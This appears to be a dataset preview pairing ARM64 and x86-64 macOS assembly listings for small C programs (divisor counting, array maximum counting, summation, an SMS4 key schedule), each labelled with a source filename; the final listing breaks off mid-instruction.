arm
stringlengths
122
20M
x86
stringlengths
122
20M
filename
stringlengths
18
26
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 mov w0, #0 str wzr, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/123966.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] stur wzr, [x29, #-20] mov w8, #500 str w8, [sp, #24] mov w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w9, [sp, #20] ldur w8, [x29, #-20] add w8, w8, w9 stur w8, [x29, #-20] ldur s1, [x29, #-20] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d0, d0 bl _numbOfDivisors ldr s2, [sp, #24] ; implicit-def: $d1 fmov s1, s2 sshll.2d v1, v1, #0 ; kill: def $d1 killed $d1 killed $q1 scvtf d1, d1 fcmp d0, d1 cset w8, lt tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: b LBB0_5 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_5: ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur s1, [x29, #-20] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d0, d0 bl _numbOfDivisors mov x8, sp str d0, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _numbOfDivisors ; -- Begin function numbOfDivisors .p2align 2 _numbOfDivisors: ; @numbOfDivisors .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str d0, [sp, #24] ldr d0, [sp, #24] fsqrt d0, d0 fcvtzs w8, d0 str w8, [sp, #20] str wzr, [sp, #12] mov w8, #1 str w8, [sp, #16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_8 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr d0, [sp, #24] fcvtzs w8, d0 ldr w10, [sp, #16] sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #2 str w8, [sp, #12] b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #20] ldr w9, [sp, #20] mul w8, w8, w9 scvtf d0, w8 ldr d1, [sp, #24] fcmp d0, d1 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB1_6 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB1_1 LBB1_8: ldr s1, [sp, #12] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d0, d0 add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d\n" l_.str.1: ; @.str.1 .asciz "%f\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movl $0, -20(%rbp) movl $500, -24(%rbp) ## imm = 0x1F4 movl $1, -28(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -28(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) cvtsi2sdl -20(%rbp), %xmm0 callq _numbOfDivisors cvtsi2sdl -24(%rbp), %xmm1 ucomisd %xmm1, %xmm0 jb LBB0_3 ## %bb.2: jmp LBB0_5 LBB0_3: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_4 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB0_1 LBB0_5: movl -20(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf cvtsi2sdl -20(%rbp), %xmm0 callq _numbOfDivisors leaq L_.str.1(%rip), %rdi movb $1, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _numbOfDivisors ## -- Begin function numbOfDivisors .p2align 4, 0x90 _numbOfDivisors: ## @numbOfDivisors .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movsd %xmm0, -8(%rbp) movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero sqrtsd %xmm0, %xmm0 cvttsd2si %xmm0, %eax movl %eax, -12(%rbp) movl $0, -20(%rbp) movl $1, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jg LBB1_8 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 cvttsd2si -8(%rbp), %eax cltd idivl -16(%rbp) cmpl $0, %edx jne LBB1_4 ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -20(%rbp), %eax addl $2, %eax movl %eax, -20(%rbp) LBB1_4: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax imull -12(%rbp), %eax cvtsi2sd %eax, %xmm0 ucomisd -8(%rbp), %xmm0 jne LBB1_6 jp LBB1_6 ## %bb.5: ## in Loop: Header=BB1_1 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) LBB1_6: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_7 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_1 LBB1_8: cvtsi2sdl -20(%rbp), %xmm0 popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d\n" L_.str.1: ## @.str.1 .asciz "%f\n" .subsections_via_symbols
the_stack_data/168891882.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #480 .cfi_def_cfa_offset 480 stp x28, x27, [sp, #448] ; 16-byte Folded Spill stp x29, x30, [sp, #464] ; 16-byte Folded Spill add x29, sp, #464 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #32] mov x9, sp add x8, sp, #28 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf add x0, sp, #36 mov x1, #404 bl _bzero str wzr, [sp, #12] mov x9, sp add x8, sp, #24 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] subs w9, w8, #1 str w9, [sp, #24] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_5 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 mov x9, sp add x8, sp, #16 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldrsw x9, [sp, #16] add x8, sp, #36 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldrsw x10, [sp, #16] add x9, sp, #36 mov w8, #1 str w8, [x9, x10, lsl #2] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_5: mov x9, sp add x8, sp, #20 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf b LBB0_6 LBB0_6: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w9, w8, #1 str w9, [sp, #20] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_10 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_6 Depth=1 mov x9, sp add x8, sp, #16 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldrsw x9, [sp, #16] add x8, sp, #36 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_9 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_6 Depth=1 ldrsw x10, [sp, #16] add x9, sp, #36 mov w8, #1 str w8, [x9, x10, lsl #2] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_6 Depth=1 b LBB0_6 LBB0_10: ldr w8, [sp, #12] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_12 b LBB0_11 LBB0_11: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_13 LBB0_12: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_13 LBB0_13: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_15 b LBB0_14 LBB0_14: bl ___stack_chk_fail LBB0_15: mov w0, #0 ldp x29, x30, [sp, #464] ; 16-byte Folded Reload ldp x28, x27, [sp, #448] ; 16-byte Folded Reload add sp, sp, #480 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz " %d" l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "I become the guy.\n" l_.str.3: ; @.str.3 .asciz "Oh, my keyboard!\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $448, %rsp ## imm = 0x1C0 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -420(%rbp) leaq L_.str(%rip), %rdi leaq -424(%rbp), %rsi movb $0, %al callq _scanf leaq -416(%rbp), %rdi xorl %esi, %esi movl $404, %edx ## imm = 0x194 callq _memset movl $0, -440(%rbp) leaq L_.str.1(%rip), %rdi leaq -428(%rbp), %rsi movb $0, %al callq _scanf LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -428(%rbp), %eax movl %eax, %ecx addl $-1, %ecx movl %ecx, -428(%rbp) cmpl $0, %eax jle LBB0_5 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.1(%rip), %rdi leaq -436(%rbp), %rsi movb $0, %al callq _scanf movslq -436(%rbp), %rax cmpl $0, -416(%rbp,%rax,4) jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movslq -436(%rbp), %rax movl $1, -416(%rbp,%rax,4) movl -440(%rbp), %eax addl $1, %eax movl %eax, -440(%rbp) LBB0_4: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_5: leaq L_.str.1(%rip), %rdi leaq -432(%rbp), %rsi movb $0, %al callq _scanf LBB0_6: ## =>This Inner Loop Header: Depth=1 movl -432(%rbp), %eax movl %eax, %ecx addl $-1, %ecx movl %ecx, -432(%rbp) cmpl $0, %eax jle LBB0_10 ## %bb.7: ## in Loop: Header=BB0_6 Depth=1 leaq L_.str.1(%rip), %rdi leaq -436(%rbp), %rsi movb $0, %al callq _scanf movslq -436(%rbp), %rax cmpl $0, -416(%rbp,%rax,4) jne LBB0_9 ## %bb.8: ## in Loop: Header=BB0_6 Depth=1 movslq -436(%rbp), %rax movl $1, -416(%rbp,%rax,4) movl -440(%rbp), %eax addl $1, %eax movl %eax, -440(%rbp) LBB0_9: ## in Loop: Header=BB0_6 Depth=1 jmp LBB0_6 LBB0_10: movl -440(%rbp), %eax cmpl -424(%rbp), %eax jne LBB0_12 ## %bb.11: leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB0_13 LBB0_12: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf LBB0_13: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_15 ## %bb.14: xorl %eax, %eax addq $448, %rsp ## imm = 0x1C0 popq %rbp retq LBB0_15: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz " %d" L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "I become the guy.\n" L_.str.3: ## @.str.3 .asciz "Oh, my keyboard!\n" .subsections_via_symbols
the_stack_data/34511667.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _countMax ; -- Begin function countMax .p2align 2 _countMax: ; @countMax .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str w1, [sp, #20] str wzr, [sp, #12] mov w8, #-2147483648 str w8, [sp, #8] str wzr, [sp, #16] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_9 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #8] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr w8, [x8, x9, lsl #2] str w8, [sp, #8] mov w8, #1 str w8, [sp, #12] b LBB0_7 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #8] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_1 LBB0_9: ldr w0, [sp, #12] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #40032 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #9, lsl #12 ; =36864 sub sp, sp, #3168 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #20] mov x9, sp add x8, sp, #12 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf str wzr, [sp, #16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldrsw x9, [sp, #16] add x8, sp, #24 add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB1_1 LBB1_4: ldr w1, [sp, #12] add x0, sp, #24 bl _countMax mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: bl ___stack_chk_fail LBB1_6: mov w0, #0 add sp, sp, #9, lsl #12 ; =36864 add sp, sp, #3168 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _countMax ## -- Begin function countMax .p2align 4, 0x90 _countMax: ## @countMax .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl $0, -20(%rbp) movl $-2147483648, -24(%rbp) ## imm = 0x80000000 movl $0, -16(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB0_9 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax cmpl -24(%rbp), %eax jle LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -24(%rbp) movl $1, -20(%rbp) jmp LBB0_7 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax cmpl -24(%rbp), %eax jne LBB0_6 ## %bb.5: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) LBB0_6: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_8 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_1 LBB0_9: movl -20(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $40032, %eax ## imm = 0x9C60 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -40020(%rbp) leaq L_.str(%rip), %rdi leaq -40028(%rbp), %rsi movb $0, %al callq _scanf movl $0, -40024(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -40024(%rbp), %eax cmpl -40028(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movslq -40024(%rbp), %rax leaq -40016(%rbp), %rsi shlq $2, %rax addq %rax, %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _scanf ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -40024(%rbp), %eax addl $1, %eax movl %eax, -40024(%rbp) jmp LBB1_1 LBB1_4: leaq -40016(%rbp), %rdi movl -40028(%rbp), %esi callq _countMax movl %eax, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_6 ## %bb.5: xorl %eax, %eax addq $40032, %rsp ## imm = 0x9C60 popq %rbp retq LBB1_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" .subsections_via_symbols
the_stack_data/36386.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] str wzr, [sp, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf mov w8, #1 stur w8, [x29, #-12] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w9, [x29, #-12] ldr w8, [sp, #16] add w8, w8, w9 str w8, [sp, #16] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_1 LBB0_4: ldr w9, [sp, #16] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\nEnter the number : " l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "Sum = %d" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $0, -16(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $1, -12(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jg LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax addl -16(%rbp), %eax movl %eax, -16(%rbp) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_1 LBB0_4: movl -16(%rbp), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\nEnter the number : " L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "Sum = %d" .subsections_via_symbols
the_stack_data/12637392.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _SMS4SetKey ; -- Begin function SMS4SetKey .p2align 2 _SMS4SetKey: ; @SMS4SetKey .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str x1, [sp] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x9, [sp, #8] ldr q0, [x9] adrp x8, _MK@PAGE add x8, x8, _MK@PAGEOFF str q0, [x8] ldr q0, [x9, #16] str q0, [x8, #16] b LBB0_2 LBB0_2: ldr x0, [sp] bl _SMS4CalcRK ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function SMS4CalcRK _SMS4CalcRK: ; @SMS4CalcRK .cfi_startproc ; %bb.0: sub sp, sp, #368 .cfi_def_cfa_offset 368 stp x28, x27, [sp, #336] ; 16-byte Folded Spill stp x29, x30, [sp, #352] ; 16-byte Folded Spill add x29, sp, #352 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x10, _MK@PAGE adrp x8, _MK@PAGE add x8, x8, _MK@PAGEOFF adrp x11, _FK@PAGE adrp x9, _FK@PAGE add x9, x9, _FK@PAGEOFF adrp x12, ___stack_chk_guard@GOTPAGE ldr x12, [x12, ___stack_chk_guard@GOTPAGEOFF] ldr x12, [x12] stur x12, [x29, #-24] str x0, [sp, #32] str xzr, [sp, #24] ldr x10, [x10, _MK@PAGEOFF] ldr x11, [x11, _FK@PAGEOFF] eor x10, x10, x11 str x10, [sp, #40] ldr x10, [x8, #8] ldr x11, [x9, #8] eor x10, x10, x11 str x10, [sp, #48] ldr x10, [x8, #16] ldr x11, [x9, #16] eor x10, x10, x11 str x10, [sp, #56] ldr x8, [x8, #24] ldr x9, [x9, #24] eor x8, x8, x9 str x8, [sp, #64] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] subs x8, x8, #32 cset w8, hs tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #24] add x9, sp, #40 str x9, [sp, #16] ; 8-byte Folded Spill ldr x8, [x9, x8, lsl #3] str x8, [sp, #8] ; 8-byte Folded Spill ldr x8, [sp, #24] add x8, x8, #1 ldr x8, [x9, x8, lsl #3] ldr x10, [sp, #24] add x10, x10, #2 ldr x10, [x9, x10, lsl #3] eor x8, x8, x10 ldr x10, [sp, #24] add x10, x10, #3 ldr x9, [x9, x10, lsl #3] eor x8, x8, x9 ldr x10, [sp, #24] adrp x9, _CK@PAGE add x9, x9, _CK@PAGEOFF ldr x9, [x9, x10, lsl #3] eor x0, x8, x9 bl _SMS4CalciRK ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload eor x9, x9, x0 ldr x10, [sp, #24] add x10, x10, #4 str x9, [x8, x10, lsl #3] ldr x9, [sp, #24] add x9, x9, #4 ldr x8, [x8, x9, lsl #3] ldr x10, [sp, #24] adrp x9, _ENRK@PAGE add x9, x9, _ENRK@PAGEOFF str x8, [x9, x10, lsl #3] b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #24] add x8, x8, #1 str x8, [sp, 